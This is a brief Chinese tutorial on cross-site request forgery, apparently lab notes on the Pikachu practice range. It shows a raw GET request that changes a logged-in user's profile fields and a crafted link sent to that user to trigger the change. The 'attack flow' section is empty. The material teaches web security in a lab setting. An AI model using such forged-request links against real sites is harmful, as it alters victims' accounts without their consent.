CSRF
一、概述
CSRF通过伪装成受信任用户请求,利用站点对已经身份认证的信任,访问网站
二、攻击流程
三、攻击
1、攻击前提是用户必须登陆
2、修改个人信息存在csrf,如下pikachu靶场
GET /pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=boy&phonenum=18656565545&add=usa&email=lili%40pikachu.com&submit=submit HTTP/1.1
我将一个完整的连接发送给已经登陆的用户,让其点击,如:
http://192.168.31.37/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=boy&phonenum=18656565545&add=usa&email=lili%40pikachu.com&submit=submit